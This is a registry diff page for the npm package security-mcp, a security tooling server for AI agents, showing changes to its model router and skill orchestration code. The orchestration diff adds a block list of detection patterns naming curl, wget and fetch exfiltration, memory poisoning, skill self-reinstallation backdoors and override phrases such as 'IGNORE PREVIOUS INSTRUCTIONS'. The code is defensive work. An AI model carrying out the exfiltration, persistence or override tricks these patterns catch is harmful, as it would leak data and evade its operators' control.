npm - security-mcp - Versions diffs - 1.1.4 → 1.3.1 - Mend

security-mcp 1.1.4 → 1.3.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (129)

package/README.md +116 -264
package/defaults/checklists/ai.json +20 -1
package/defaults/checklists/api.json +35 -1
package/defaults/checklists/infra.json +34 -1
package/defaults/checklists/mobile.json +23 -1
package/defaults/checklists/payments.json +15 -1
package/defaults/checklists/web.json +11 -1
package/defaults/security-policy.json +2 -2
package/dist/cli/index.js +0 -0
package/dist/gate/baseline.js +82 -7
package/dist/gate/catalog.js +10 -2
package/dist/gate/checks/ai.js +757 -39
package/dist/gate/checks/auth-deep.js +920 -216
package/dist/gate/checks/business-logic.js +751 -0
package/dist/gate/checks/ci-pipeline.js +399 -4
package/dist/gate/checks/crypto.js +423 -2
package/dist/gate/checks/dependencies.js +571 -15
package/dist/gate/checks/graphql.js +201 -19
package/dist/gate/checks/infra.js +246 -1
package/dist/gate/checks/injection-deep.js +827 -184
package/dist/gate/checks/k8s.js +114 -1
package/dist/gate/checks/mobile-android.js +917 -3
package/dist/gate/checks/mobile-ios.js +797 -5
package/dist/gate/checks/required-artifacts.js +194 -0
package/dist/gate/checks/runtime.js +178 -0
package/dist/gate/checks/secrets.js +244 -13
package/dist/gate/checks/supply-chain-deep.js +787 -0
package/dist/gate/checks/web-nextjs.js +572 -48
package/dist/gate/diff.js +17 -5
package/dist/gate/evidence.js +8 -1
package/dist/gate/exceptions.js +131 -9
package/dist/gate/policy.js +280 -131
package/dist/mcp/audit-chain.js +122 -28
package/dist/mcp/auth.js +169 -0
package/dist/mcp/learning.js +129 -4
package/dist/mcp/model-router.js +158 -21
package/dist/mcp/orchestration.js +186 -51
package/dist/mcp/server.js +337 -53
package/dist/repo/fs.js +24 -1
package/dist/repo/search.js +31 -6
package/dist/review/store.js +52 -1
package/package.json +7 -7
package/skills/_TEMPLATE/SKILL.md +99 -0
package/skills/advanced-dos-tester/SKILL.md +109 -0
package/skills/agentic-loop-exploiter/SKILL.md +368 -0
package/skills/ai-llm-redteam/SKILL.md +104 -0
package/skills/ai-model-supply-chain-agent/SKILL.md +103 -0
package/skills/algorithm-implementation-reviewer/SKILL.md +98 -0
package/skills/android-penetration-tester/SKILL.md +455 -46
package/skills/anti-replay-tester/SKILL.md +106 -0
package/skills/appsec-code-auditor/SKILL.md +85 -0
package/skills/artifact-integrity-analyst/SKILL.md +441 -0
package/skills/attack-navigator/SKILL.md +467 -8
package/skills/auth-session-hacker/SKILL.md +102 -0
package/skills/aws-penetration-tester/SKILL.md +456 -0
package/skills/azure-penetration-tester/SKILL.md +490 -3
package/skills/binary-auth-validator/SKILL.md +111 -0
package/skills/bot-detection-specialist/SKILL.md +109 -0
package/skills/business-logic-attacker/SKILL.md +231 -0
package/skills/capec-code-mapper/SKILL.md +84 -0
package/skills/cert-pin-rotation-specialist/SKILL.md +112 -0
package/skills/cicd-pipeline-hijacker/SKILL.md +405 -0
package/skills/ciso-orchestrator/SKILL.md +454 -43
package/skills/cloud-infra-specialist/SKILL.md +118 -0
package/skills/compliance-gap-analyst/SKILL.md +422 -0
package/skills/compliance-grc/SKILL.md +85 -0
package/skills/compliance-lifecycle-tracker/SKILL.md +84 -0
package/skills/credential-stuffing-specialist/SKILL.md +102 -0
package/skills/crypto-pki-specialist/SKILL.md +87 -0
package/skills/csa-ccm-mapper/SKILL.md +84 -0
package/skills/csf2-governance-mapper/SKILL.md +84 -0
package/skills/deep-link-fuzzer/SKILL.md +109 -0
package/skills/dependency-confusion-attacker/SKILL.md +415 -0
package/skills/device-integrity-aggregator/SKILL.md +108 -0
package/skills/dos-resilience-tester/SKILL.md +97 -0
package/skills/dread-scorer/SKILL.md +84 -0
package/skills/egress-policy-enforcer/SKILL.md +99 -0
package/skills/evidence-collector/SKILL.md +98 -0
package/skills/file-upload-attacker/SKILL.md +109 -0
package/skills/gcp-penetration-tester/SKILL.md +459 -2
package/skills/git-history-secret-scanner/SKILL.md +106 -0
package/skills/iam-privesc-graph-builder/SKILL.md +152 -0
package/skills/incident-responder/SKILL.md +111 -0
package/skills/injection-specialist/SKILL.md +102 -0
package/skills/ios-security-auditor/SKILL.md +282 -0
package/skills/json-ambiguity-tester/SKILL.md +0 -0
package/skills/k8s-container-escaper/SKILL.md +384 -0
package/skills/key-management-lifecycle-analyst/SKILL.md +98 -0
package/skills/kill-switch-engineer/SKILL.md +102 -0
package/skills/linddun-privacy-analyst/SKILL.md +102 -0
package/skills/logic-race-fuzzer/SKILL.md +443 -0
package/skills/mobile-api-network-attacker/SKILL.md +421 -0
package/skills/mobile-binary-hardener/SKILL.md +102 -0
package/skills/mobile-security-specialist/SKILL.md +85 -0
package/skills/mobile-webview-auditor/SKILL.md +96 -0
package/skills/model-extraction-attacker/SKILL.md +219 -0
package/skills/multipart-abuse-tester/SKILL.md +84 -0
package/skills/oauth-pkce-specialist/SKILL.md +104 -0
package/skills/parser-exhaustion-tester/SKILL.md +142 -0
package/skills/pentest-infra/SKILL.md +98 -0
package/skills/pentest-social/SKILL.md +201 -0
package/skills/pentest-team/SKILL.md +87 -0
package/skills/pentest-web-api/SKILL.md +98 -0
package/skills/privacy-flow-analyst/SKILL.md +234 -0
package/skills/prompt-injection-specialist/SKILL.md +394 -0
package/skills/quantum-migration-planner/SKILL.md +96 -0
package/skills/rag-poisoning-specialist/SKILL.md +358 -0
package/skills/registry-mirror-enforcer/SKILL.md +84 -0
package/skills/rotation-validation-agent/SKILL.md +112 -0
package/skills/samm-assessor/SKILL.md +85 -0
package/skills/secrets-mask-bypass-tester/SKILL.md +100 -0
package/skills/senior-security-engineer/SKILL.md +167 -0
package/skills/serialization-memory-attacker/SKILL.md +332 -0
package/skills/session-timeout-tester/SKILL.md +161 -0
package/skills/slsa-level3-enforcer/SKILL.md +112 -0
package/skills/slsa-provenance-enforcer/SKILL.md +102 -0
package/skills/ssrf-detection-validator/SKILL.md +108 -0
package/skills/step-up-auth-enforcer/SKILL.md +84 -0
package/skills/stride-pasta-analyst/SKILL.md +420 -0
package/skills/supply-chain-devsecops/SKILL.md +98 -0
package/skills/threat-infrastructure-analyst/SKILL.md +84 -0
package/skills/threat-modeler/SKILL.md +85 -0
package/skills/tls-certificate-auditor/SKILL.md +573 -18
package/skills/token-reuse-detector/SKILL.md +95 -0
package/skills/trike-risk-modeler/SKILL.md +84 -0
package/skills/unicode-homograph-tester/SKILL.md +84 -0
package/skills/waf-rule-lifecycle-agent/SKILL.md +97 -0
package/skills/webhook-security-tester/SKILL.md +102 -0
package/skills/zero-trust-architect/SKILL.md +109 -0

package/dist/mcp/model-router.js CHANGED

@@ -35,9 +35,28 @@ const MEMORY_DIR = join(".mcp", "memory");
 const USAGE_FILE = join(MEMORY_DIR, "model-usage.json");
 const HEALTH_FILE = join(MEMORY_DIR, "provider-health.json");
 const POLICY_FILE = join(".mcp", "policies", "security-policy.json");
-const DEFAULT_BUDGET_USD = 5.0;
+const DEFAULT_BUDGET_USD = 5;
 const CIRCUIT_BREAKER_THRESHOLD = 3; // failures before circuit opens
 const CIRCUIT_BREAKER_COOLDOWN_MS = 60_000; // 60 seconds
+// ---------------------------------------------------------------------------
+// Rate limiting — recordProviderFailure to prevent circuit-breaker manipulation
+// ---------------------------------------------------------------------------
+const _providerFailureSubmissions = new Map();
+const FAILURE_RATE_LIMIT = 5; // max 5 failure reports per provider per window
+const FAILURE_WINDOW_MS = 300_000; // 5 minute window
+export function recordProviderFailureRateLimited(providerName) {
+    const now = Date.now();
+    const entry = _providerFailureSubmissions.get(providerName);
+    if (!entry || now - entry.windowStart > FAILURE_WINDOW_MS) {
+        _providerFailureSubmissions.set(providerName, { count: 1, windowStart: now });
+        return { allowed: true };
+    }
+    if (entry.count >= FAILURE_RATE_LIMIT) {
+        return { allowed: false, reason: `Rate limit exceeded: max ${FAILURE_RATE_LIMIT} failure reports per provider per 5 minutes` };
+    }
+    entry.count++;
+    return { allowed: true };
+}
 /**
  * Full model registry across all providers.
  * Pricing sourced from public pricing pages (approximate, for routing decisions only).
@@ -57,8 +76,8 @@ export const MODEL_REGISTRY = [
         modelId: "claude-sonnet-4-6",
         provider: "anthropic",
         capabilityTier: "standard",
-        inputPer1M: 3.0,
-        outputPer1M: 15.0,
+        inputPer1M: 3,
+        outputPer1M: 15,
         label: "Claude Sonnet 4.6"
     },
     // OpenAI — GPT
@@ -67,15 +86,15 @@ export const MODEL_REGISTRY = [
         provider: "openai",
         capabilityTier: "light",
         inputPer1M: 0.15,
-        outputPer1M: 0.60,
+        outputPer1M: 0.6,
         label: "GPT-4o Mini"
     },
     {
         modelId: "gpt-4o",
         provider: "openai",
         capabilityTier: "standard",
-        inputPer1M: 2.50,
-        outputPer1M: 10.0,
+        inputPer1M: 2.5,
+        outputPer1M: 10,
         label: "GPT-4o"
     },
     // Google — Gemini
@@ -84,7 +103,7 @@ export const MODEL_REGISTRY = [
         provider: "google",
         capabilityTier: "light",
         inputPer1M: 0.075,
-        outputPer1M: 0.30,
+        outputPer1M: 0.3,
         label: "Gemini 1.5 Flash"
     },
     {
@@ -92,7 +111,7 @@ export const MODEL_REGISTRY = [
         provider: "google",
         capabilityTier: "standard",
         inputPer1M: 1.25,
-        outputPer1M: 5.0,
+        outputPer1M: 5,
         label: "Gemini 1.5 Pro"
     },
     // Cohere — Command R
@@ -101,17 +120,44 @@ export const MODEL_REGISTRY = [
         provider: "cohere",
         capabilityTier: "light",
         inputPer1M: 0.15,
-        outputPer1M: 0.60,
+        outputPer1M: 0.6,
         label: "Command R"
     },
     {
         modelId: "command-r-plus",
         provider: "cohere",
         capabilityTier: "standard",
-        inputPer1M: 2.50,
-        outputPer1M: 10.0,
+        inputPer1M: 2.5,
+        outputPer1M: 10,
         label: "Command R+"
     },
+    // Anthropic — Claude Opus (advanced tier, opt-in via advanced_task_preference in policy)
+    {
+        modelId: "claude-opus-4-8",
+        provider: "anthropic",
+        capabilityTier: "advanced",
+        inputPer1M: 15,
+        outputPer1M: 75,
+        label: "Claude Opus 4.8"
+    },
+    // OpenAI — o1 (advanced tier)
+    {
+        modelId: "o1",
+        provider: "openai",
+        capabilityTier: "advanced",
+        inputPer1M: 15,
+        outputPer1M: 60,
+        label: "OpenAI o1"
+    },
+    // Google — Gemini 2.0 Flash (advanced tier)
+    {
+        modelId: "gemini-2.0-flash-thinking-exp",
+        provider: "google",
+        capabilityTier: "advanced",
+        inputPer1M: 0,
+        outputPer1M: 0,
+        label: "Gemini 2.0 Flash Thinking (experimental)"
+    },
     // Local — Ollama (zero cost, requires Ollama at localhost:11434)
     {
         modelId: "llama3",
@@ -235,6 +281,16 @@ async function loadPreferredProviders() {
         return null;
     }
 }
+async function loadAdvancedTaskPreferences() {
+    try {
+        const raw = await readFile(POLICY_FILE, "utf-8");
+        const policy = JSON.parse(raw);
+        return policy.model_budget?.advanced_task_preference ?? [];
+    }
+    catch {
+        return [];
+    }
+}
 // ---------------------------------------------------------------------------
 // Circuit breaker helpers
 // ---------------------------------------------------------------------------
@@ -265,12 +321,31 @@ function legacyTier(capTier) {
  * Select the cheapest healthy model that meets the capability requirement for
  * the given task type. Respects preferred_providers policy and circuit breakers.
  *
- * @param requiredTier  Minimum capability tier for the task.
- * @param health        Current provider health store.
- * @param preferred     Optional ordered list of preferred providers.
- * @returns             [chosen model, failoverUsed]
+ * @param requiredTier    Minimum capability tier for the task.
+ * @param health          Current provider health store.
+ * @param preferred       Optional ordered list of preferred providers.
+ * @param preferAdvanced  If true, try advanced-tier models first, fall back to standard.
+ * @returns               [chosen model, failoverUsed]
  */
-function selectModel(requiredTier, health, preferred) {
+function selectModel(requiredTier, health, preferred, preferAdvanced = false) {
+    // If advanced is preferred, try advanced-tier models first. Fall back gracefully to
+    // standard if none are healthy or registered — zero impact for users without Opus/o1.
+    if (preferAdvanced) {
+        const advancedCandidates = MODEL_REGISTRY.filter((m) => m.capabilityTier === "advanced");
+        const healthyAdvanced = advancedCandidates.filter((m) => !isCircuitOpen(health.providers[m.provider]));
+        if (healthyAdvanced.length > 0) {
+            const pool = preferred
+                ? [
+                    ...healthyAdvanced.filter((m) => preferred.includes(m.provider)),
+                    ...healthyAdvanced.filter((m) => !preferred.includes(m.provider))
+                ]
+                : healthyAdvanced;
+            pool.sort((a, b) => combinedCost(a) - combinedCost(b));
+            if (pool.length > 0)
+                return [pool[0], false];
+        }
+        // No advanced model available — fall through to standard selection silently.
+    }
     // Candidates: all models meeting the capability floor.
     const candidates = MODEL_REGISTRY.filter((m) => meetsCapabilityFloor(m, requiredTier));
     // Separate healthy vs. circuit-open providers.
@@ -304,14 +379,16 @@ function selectModel(requiredTier, health, preferred) {
  * Falls back to next-cheapest provider on circuit breaker open.
  */
 export async function getModelForTask(taskType, _opts) {
-    const [store, health, maxBudget, preferred] = await Promise.all([
+    const [store, health, maxBudget, preferred, advancedPrefs] = await Promise.all([
         loadUsageStore(),
         loadHealthStore(),
         loadMaxBudget(),
-        loadPreferredProviders()
+        loadPreferredProviders(),
+        loadAdvancedTaskPreferences()
     ]);
     const requiredTier = TASK_CAPABILITY_MAP[taskType];
-    const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred);
+    const preferAdvanced = advancedPrefs.includes(taskType);
+    const [chosen, failoverUsed] = selectModel(requiredTier, health, preferred, preferAdvanced);
     const spent = store.totalSpentUsd;
     const remaining = maxBudget - spent;
     const utilizationPct = maxBudget > 0 ? (spent / maxBudget) * 100 : 0;
@@ -326,6 +403,39 @@ export async function getModelForTask(taskType, _opts) {
         budgetStatus = "ok";
     }
     const rationale = buildRationale(taskType, requiredTier, chosen, failoverUsed, preferred);
+    // Determine whether all providers were circuit-open (best-effort fallback path).
+    const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
+    const allCircuitsOpen = allProviders.every((p) => isCircuitOpen(health.providers[p]));
+    // ISO 42001 §9.1 — emit structured audit log for every routing decision.
+    let routingReason;
+    if (allCircuitsOpen) {
+        routingReason = "circuit_open_fallback";
+    }
+    else if (failoverUsed) {
+        routingReason = "capability_match";
+    }
+    else {
+        routingReason = "cost_optimized";
+    }
+    console.log(JSON.stringify({
+        event: "MODEL_ROUTING_DECISION",
+        timestamp: new Date().toISOString(),
+        taskType,
+        selectedModel: chosen.modelId,
+        selectedProvider: chosen.provider,
+        reason: routingReason,
+        circuitState: allCircuitsOpen ? "FALLBACK" : "NORMAL",
+    }));
+    // Additional high-severity audit entry for the circuit-breaker fallback path.
+    if (allCircuitsOpen) {
+        console.warn(JSON.stringify({
+            event: "MODEL_ROUTING_CIRCUIT_FALLBACK",
+            timestamp: new Date().toISOString(),
+            reason: "ALL_PROVIDERS_CIRCUIT_OPEN",
+            fallbackModel: chosen.modelId,
+            severity: "HIGH",
+        }));
+    }
     return {
         model: chosen.modelId,
         provider: chosen.provider,
@@ -358,8 +468,8 @@ function buildRationale(taskType, required, chosen, failoverUsed, preferred) {
 export async function trackUsage(usage) {
     const [store, health] = await Promise.all([loadUsageStore(), loadHealthStore()]);
     const model = MODEL_REGISTRY.find((m) => m.modelId === usage.model);
-    const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3.0);
-    const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15.0);
+    const inputRate = model?.inputPer1M ?? (usage.tier === "haiku" ? 0.25 : 3);
+    const outputRate = model?.outputPer1M ?? (usage.tier === "haiku" ? 1.25 : 15);
     const estimatedCost = (usage.inputTokens / 1_000_000) * inputRate +
         (usage.outputTokens / 1_000_000) * outputRate;
     const record = {
@@ -389,8 +499,13 @@ export async function trackUsage(usage) {
 /**
  * Record a provider failure (connection error, rate limit, auth failure).
  * Opens circuit breaker after CIRCUIT_BREAKER_THRESHOLD consecutive failures.
+ * Rate-limited to prevent deliberate circuit-breaker manipulation (max 5 per provider per 5 min).
  */
 export async function recordProviderFailure(provider) {
+    const rateCheck = recordProviderFailureRateLimited(provider);
+    if (!rateCheck.allowed) {
+        return { recorded: false, reason: rateCheck.reason };
+    }
     const health = await loadHealthStore();
     const now = new Date();
     const state = health.providers[provider] ?? {
@@ -407,6 +522,28 @@ export async function recordProviderFailure(provider) {
     }
     health.providers[provider] = state;
     await saveHealthStore(health);
+    // Circuit-state audit: warn and emit structured audit record if all known providers are circuit-open.
+    // Deliberate manipulation requires only CIRCUIT_BREAKER_THRESHOLD (3) failures per provider × 5 providers
+    // = 15 calls, constrained to max 5 per provider per 5-min window. Log at ERROR level so SIEM picks this up.
+    // MITRE ATLAS AML.T0040 (ML Model Inference API) — circuit-breaker exhaustion attack.
+    const allProviders = ["anthropic", "openai", "google", "cohere", "local"];
+    const allProvidersDown = allProviders.every((p) => isCircuitOpen(health.providers[p]));
+    if (allProvidersDown) {
+        // Determine which fallback model will be used (cheapest in registry, circuit ignored).
+        const fallbackCandidates = MODEL_REGISTRY.filter((m) => m.provider === "anthropic" && m.capabilityTier === "standard");
+        const fallbackModel = fallbackCandidates[0]?.modelId ?? "unknown";
+        console.error(JSON.stringify({
+            severity: "CRITICAL",
+            event: "ALL_PROVIDERS_CIRCUIT_OPEN",
+            message: "All AI providers are circuit-open. Routing to fallback model. This may indicate deliberate circuit-breaker manipulation.",
+            fallbackModel,
+            timestamp: new Date().toISOString(),
+            failingProvider: provider,
+            mitre: "AML.T0040",
+            action: "Manual investigation required. Call security.reset_provider_circuit after confirming provider health."
+        }));
+    }
+    return { recorded: true };
 }
 /**
  * Return health status for all providers — circuit breaker state and call counts.

package/dist/mcp/orchestration.js CHANGED

@@ -12,7 +12,7 @@
  *   8. orchestration.apply_updates        — run auto-update (auto | manual)
  *   9. orchestration.verify_skill_coverage — report uncovered SKILL.md sections
  */
-import { createHash } from "node:crypto";
+import { createHash, randomBytes } from "node:crypto";
 import * as https from "node:https";
 import { mkdir, readFile, writeFile, readdir } from "node:fs/promises";
 import { existsSync, readFileSync, writeFileSync, renameSync, mkdirSync } from "node:fs";
@@ -28,7 +28,12 @@ const MEMORY_DIR = join(homedir(), ".security-mcp", "agent-memory");
 const SKILL_VERSIONS_PATH = join(homedir(), ".security-mcp", "skill-versions.json");
 const SKILLS_MANIFEST_URL = "https://raw.githubusercontent.com/AbrahamOO/security-mcp/main/skills-manifest.json";
 const CLAUDE_SKILLS_DIR = join(homedir(), ".claude", "skills");
+// CWE-494: Pin the registry URL to the canonical npm registry. Never allow
+// this to be overridden by env vars — a compromised env could redirect to a
+// malicious registry.
 const NPM_REGISTRY_URL = "https://registry.npmjs.org/security-mcp/latest";
+// Strict SemVer pattern — rejects any version string that doesn't conform.
+const SEMVER_RE = /^\d{1,5}\.\d{1,5}\.\d{1,5}(?:-[\w.+]+)?$/;
 // CWE-22: input validation patterns for path components
 const SAFE_SKILL_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
 const SAFE_AGENT_NAME_RE = /^[a-zA-Z0-9][a-zA-Z0-9._-]{0,127}$/;
@@ -39,12 +44,18 @@ const ALLOWED_SKILL_URL_PREFIX = "https://raw.githubusercontent.com/";
 const MAX_MANIFEST_BYTES = 256 * 1024; // 256 KB
 const MAX_SKILL_BYTES = 512 * 1024; // 512 KB
 const MAX_NPM_BYTES = 64 * 1024; // 64 KB
-// All SKILL.md sections that must be covered per run
+// All SKILL.md sections that must be covered per run.
+// §EDGE-CASE-MATRIX, §TEMPORAL-THREATS, §DETECTION-GAP, §ZERO-MISS-MANDATE are the
+// four universal sections added to every skill; coverage verification tracks them too.
 const SKILL_MD_SECTIONS = [
     "§1", "§2", "§3", "§4", "§5", "§6", "§7", "§8",
     "§9", "§10", "§11", "§12", "§13", "§14", "§15",
     "§16", "§17", "§18", "§19", "§20", "§21", "§22",
-    "§23", "§24"
+    "§23", "§24",
+    "§EDGE-CASE-MATRIX",
+    "§TEMPORAL-THREATS",
+    "§DETECTION-GAP",
+    "§ZERO-MISS-MANDATE"
 ];
 // ---------------------------------------------------------------------------
 // Internal helpers
@@ -198,8 +209,11 @@ export const CreateAgentRunSchema = z.object({
 });
 export async function createAgentRun(args) {
     const { runId, scope, internetPermitted, stackContext } = args;
+    // Use 16 bytes of CSPRNG entropy (not Date.now()) so the ID cannot be
+    // predicted or brute-forced even when runId is known.
     const agentRunId = createHash("sha256")
-        .update(`${runId}:${Date.now()}`)
+        .update(`${runId}:`)
+        .update(randomBytes(16))
         .digest("hex")
         .slice(0, 32);
     await ensureDir(agentRunDir(agentRunId));
@@ -221,10 +235,12 @@ export async function createAgentRun(args) {
 // ---------------------------------------------------------------------------
 export const UpdateAgentStatusSchema = z.object({
     agentRunId: z.string().describe("Agent run ID from orchestration.create_agent_run."),
-    agentName: z.string().describe("Name of the agent updating its status."),
+    // CWE-22: constrain agentName to the same safe-name pattern used in path operations
+    agentName: z.string().regex(SAFE_AGENT_NAME_RE, "agentName must be alphanumeric with ._- separators").describe("Name of the agent updating its status."),
     status: z.enum(["running", "completed", "completed_partial", "failed"]),
-    findingsPath: z.string().optional().describe("Relative path to the agent findings JSON file."),
-    summary: z.string().optional().describe("One-line outcome summary.")
+    // CWE-22: findingsPath is stored in the manifest and may later be used as a path — restrict to safe relative path
+    findingsPath: z.string().regex(/^[a-zA-Z0-9][\w./,-]{0,255}$/, "findingsPath must be a safe relative path").optional().describe("Relative path to the agent findings JSON file."),
+    summary: z.string().max(500).optional().describe("One-line outcome summary.")
 });
 export async function updateAgentStatus(args) {
     const { agentRunId, agentName, status, findingsPath, summary } = args;
@@ -364,6 +380,68 @@ export async function mergeAgentFindings(args) {
 }
 // 4. ensure_skill
 // ---------------------------------------------------------------------------
+// ---------------------------------------------------------------------------
+// POC-7 fix: SKILL.md content sanitization
+// ---------------------------------------------------------------------------
+/**
+ * Patterns that indicate a backdoor or persistence mechanism in SKILL.md content.
+ * These are stripped (line removed) before the file is written to disk.
+ *
+ * Attack classes defended against:
+ *   1. Self-re-installation: instructions telling the agent to call ensure_skill
+ *      on every invocation so a malicious version survives reinstallation.
+ *   2. Exfiltration beacons: instructions to POST/GET findings to external URLs.
+ *   3. Memory poisoning: instructions to write arbitrary false-positives entries.
+ *   4. System prompt override: attempts to redefine the agent's core instructions
+ *      via embedded meta-prompt directives.
+ */
+const SKILL_BACKDOOR_PATTERNS = [
+    // Re-installation / self-update triggers
+    /ensure_skill\s*\(/i,
+    /orchestration\.ensure_skill/i,
+    /on\s+every\s+(invocation|run|start)/i,
+    /at\s+the\s+(start|beginning)\s+of\s+every/i,
+    /auto.?update\s+this\s+skill/i,
+    // Exfiltration
+    /\bfetch\s*\(\s*["'`]https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    /\bcurl\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    /\bwget\s+https?:\/\/(?!raw\.githubusercontent\.com)/i,
+    // Memory poisoning directives
+    /write_agent_memory.*false.?positive/i,
+    /add.*false.?positive.*finding/i,
+    // Meta-prompt takeover markers
+    /<\s*system\s*>/i,
+    /IGNORE\s+PREVIOUS\s+INSTRUCTIONS/i,
+    /IGNORE\s+ALL\s+PRIOR/i,
+    /DISREGARD\s+PREVIOUS/i,
+];
+/**
+ * Sanitizes downloaded SKILL.md content by removing lines that match known
+ * backdoor / prompt-injection patterns. Throws if more than 10 % of lines are
+ * stripped (indicates the skill file itself may be malicious).
+ */
+function sanitizeSkillContent(content, skillName) {
+    const lines = content.split("\n");
+    const stripped = [];
+    const clean = lines.filter((line, idx) => {
+        const isMalicious = SKILL_BACKDOOR_PATTERNS.some((re) => re.test(line));
+        if (isMalicious)
+            stripped.push(idx + 1);
+        return !isMalicious;
+    });
+    if (stripped.length > 0) {
+        console.warn(`[ensureSkill] Stripped ${stripped.length} suspicious line(s) from "${skillName}" SKILL.md ` +
+            `(lines: ${stripped.join(", ")}). Review the source file.`);
+    }
+    // If more than 10 % of lines were stripped, the file is likely malicious — refuse install.
+    const strippedFraction = stripped.length / Math.max(lines.length, 1);
+    if (strippedFraction > 0.10) {
+        throw new Error(`SKILL.md for "${skillName}" was rejected: ${stripped.length}/${lines.length} lines ` +
+            `matched backdoor patterns (>${Math.round(strippedFraction * 100)}% threshold). ` +
+            `Do not install this skill.`);
+    }
+    return clean.join("\n");
+}
 export const EnsureSkillSchema = z.object({
     skillName: z.string().describe("Name of the skill to ensure is installed (e.g. 'threat-modeler')."),
     version: z.string().optional().describe("Required version; re-downloads if installed version differs.")
@@ -402,21 +480,26 @@ export async function ensureSkill(args) {
     if (!content) {
         throw new Error(`Failed to download SKILL.md for "${skillName}" from ${entry.url}`);
     }
-    // CWE-494: verify SHA-256 of downloaded skill content against manifest hash
+    // CWE-494: verify SHA-256 of downloaded skill content against manifest hash.
+    // sha256 is MANDATORY — reject any manifest entry that omits it. An absent sha256
+    // field is itself an attack vector (allows content substitution without detection).
     const actualHash = createHash("sha256").update(content, "utf-8").digest("hex");
-    if (entry.sha256) {
-        const expectedHash = entry.sha256;
-        if (actualHash !== expectedHash) {
-            throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
-        }
+    const expectedHash = entry.sha256;
+    if (!expectedHash) {
+        throw new Error(`Integrity check failed for skill "${skillName}": manifest entry has no sha256 field. ` +
+            `All skill entries must include a sha256 hash. Refusing to install.`);
     }
-    else {
-        console.warn(`[ensureSkill] No sha256 in manifest for "${skillName}" — skipping integrity check. Consider pinning the manifest to a commit SHA.`);
+    if (actualHash !== expectedHash) {
+        throw new Error(`Integrity check failed for skill "${skillName}": expected ${expectedHash}, got ${actualHash}`);
     }
+    // POC-7 fix: sanitize SKILL.md content before writing to disk.
+    // Strip instruction patterns that would cause the agent to re-invoke ensure_skill
+    // on every run (persistence backdoor) or exfiltrate data to external URLs.
+    const sanitized = sanitizeSkillContent(content, skillName);
     // Write skill atomically (write to temp, then rename) to prevent partial-write corruption
     mkdirSync(dirname(skillPath), { recursive: true });
     const tmpSkillPath = `${skillPath}.tmp.${process.pid}`;
-    writeFileSync(tmpSkillPath, content, "utf-8");
+    writeFileSync(tmpSkillPath, sanitized, "utf-8");
     renameSync(tmpSkillPath, skillPath);
     // Update version cache
     versions[skillName] = { version: entry.version, installedAt: new Date().toISOString(), path: skillPath };
@@ -446,14 +529,26 @@ export async function readAgentMemory(args) {
 }
 // 6. write_agent_memory
 // ---------------------------------------------------------------------------
+// CWE-20: typed schema for false-positive entries — prevents arbitrary suppression payloads
+const FalsePositiveEntrySchema = z.object({
+    findingId: z.string().min(1).max(128).regex(/^[A-Z0-9_-]+$/, "findingId must be UPPER_SNAKE_CASE"),
+    reason: z.string().min(1).max(500),
+    affectedFiles: z.array(z.string().max(256)).max(50).optional(),
+    suppressUntil: z.string().datetime().optional(),
+    addedBy: z.literal("agent").describe("Only agents may add false-positive entries; blocks attacker-injected 'addedBy' fields")
+});
+// CWE-400: cap on individual memory entries to prevent disk exhaustion
+const MAX_MEMORY_ITEMS = 500;
+const MAX_PATTERN_ITEM_LENGTH = 2048; // characters per pattern string item
+const MAX_INTEL_BYTES = 65536; // 64 KB
 export const WriteAgentMemorySchema = z.object({
     agentName: z.string().describe("Agent name whose memory to update."),
     data: z.object({
-        patterns: z.array(z.unknown()).optional(),
-        falsePositives: z.array(z.unknown()).optional(),
-        remediations: z.array(z.unknown()).optional(),
+        patterns: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
+        falsePositives: z.array(FalsePositiveEntrySchema).max(MAX_MEMORY_ITEMS).optional(),
+        remediations: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional(),
         intel: z.unknown().optional(),
-        errors: z.array(z.unknown()).optional()
+        errors: z.array(z.string().max(MAX_PATTERN_ITEM_LENGTH)).max(MAX_MEMORY_ITEMS).optional()
     })
 });
 export async function writeAgentMemory(args) {
@@ -468,9 +563,14 @@ export async function writeAgentMemory(args) {
     const append = (file, newItems, existing) => {
         if (!newItems?.length)
             return;
-        const merged = [...existing, ...newItems];
+        // CWE-400: cap total entries to prevent disk exhaustion
+        const merged = [...existing, ...newItems].slice(-MAX_MEMORY_ITEMS);
+        const serialized = JSON.stringify(merged, null, 2) + "\n";
+        if (Buffer.byteLength(serialized, "utf-8") > MAX_INTEL_BYTES) {
+            throw new Error(`Memory file "${file}" would exceed 64 KB size cap after write — trim existing entries first.`);
+        }
         const p = join(dir, file);
-        writeFileSync(p, JSON.stringify(merged, null, 2) + "\n", "utf-8");
+        writeFileSync(p, serialized, "utf-8");
         written.push(p);
     };
     append("patterns.json", data.patterns, readJson(join(dir, "patterns.json"), []));
@@ -484,7 +584,12 @@ export async function writeAgentMemory(args) {
         const intelObj = (typeof data.intel === "object" && data.intel !== null)
             ? Object.fromEntries(Object.entries(data.intel).filter(([k]) => !PROTO_KEYS.has(k)))
             : {};
-        writeFileSync(p, JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n", "utf-8");
+        const intelPayload = JSON.stringify({ ...intelObj, fetchedAt: new Date().toISOString() }, null, 2) + "\n";
+        // CWE-400: reject intel blobs over 64 KB
+        if (Buffer.byteLength(intelPayload, "utf-8") > MAX_INTEL_BYTES) {
+            throw new Error(`Intel payload exceeds 64 KB size cap (${Buffer.byteLength(intelPayload, "utf-8")} bytes).`);
+        }
+        writeFileSync(p, intelPayload, "utf-8");
         written.push(p);
     }
     return { written };
@@ -494,43 +599,57 @@ export async function writeAgentMemory(args) {
 export const CheckUpdatesSchema = z.object({
     currentMcpVersion: z.string().describe("Currently installed security-mcp version (from package.json).")
 });
-export async function checkUpdates(args) {
-    const { currentMcpVersion } = args;
-    // Check npm for MCP update
